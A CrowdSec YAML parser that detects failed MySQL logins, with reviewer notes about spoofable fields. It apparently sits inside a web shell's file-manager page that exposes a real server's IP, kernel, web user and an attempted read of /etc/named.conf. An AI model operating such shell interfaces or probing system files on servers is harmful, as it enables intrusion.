Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
apache2-logs.yaml
3.32
KB
-rw-r--r--
2024-10-04 14:15
mysql-logs.yaml
787
B
-rw-r--r--
2024-03-12 23:06
sshd-logs.yaml
4.83
KB
-rw-r--r--
2024-10-04 14:15
# CrowdSec parser crowdsecurity/mysql-logs: extracts failed MySQL
# authentication attempts from log lines.
# Block structure was restored from a single collapsed line; `statics` is
# placed at the top level here. NOTE(review): confirm against the installed file.

# When a node matches, hand the event on to the next parsing stage.
onsuccess: next_stage
name: crowdsecurity/mysql-logs
description: "Parse MySQL logs"

# Only events whose parsed program field is 'mysql' are considered.
filter: "evt.Parsed.program == 'mysql'"

pattern_syntax:
  # Reusable sub-pattern for the "Access denied" message.
  # `user` comes from the login name the client supplied, so treat it as
  # untrusted wherever meta.user is displayed or used downstream.
  # NOTE(review): DATA is a loose match and the pattern is not end-anchored;
  # confirm a crafted login name cannot change which address is captured as
  # source_ip, since that is the field decisions are keyed on.
  MYSQL_ACCESS_DENIED: "Access denied for user '%{DATA:user}'@'%{IP:source_ip}' \\(using password: %{WORD:using_password}\\)"

nodes:
  # Lines of the form "<timestamp> <number> [Note] ..." with optional
  # [err_code] [subsystem] fields before the access-denied message.
  - grok:
      pattern: "%{TIMESTAMP_ISO8601:time} %{NUMBER} \\[Note\\]( \\[%{DATA:err_code}\\] \\[%{DATA:subsystem}\\])? %{MYSQL_ACCESS_DENIED}"
      apply_on: message
  # Lines of the form "<timestamp> ... <number> Connect ..."; presumably a
  # different server or log variant. Verify which one before tightening the
  # wildcards.
  - grok:
      pattern: "%{TIMESTAMP_ISO8601:time}.*%{NUMBER} Connect.*%{MYSQL_ACCESS_DENIED}"
      apply_on: message

statics:
  # Label the event so scenarios can select failed MySQL authentications.
  - meta: log_type
    value: mysql_failed_auth
  # Address taken from the log line, copied into the event metadata.
  - meta: source_ip
    expression: "evt.Parsed.source_ip"
  # Use the timestamp from the log line as the event time string.
  - target: evt.StrTime
    expression: evt.Parsed.time
  # Login name from the log line (client-supplied, see pattern_syntax).
  - meta: user
    expression: "evt.Parsed.user"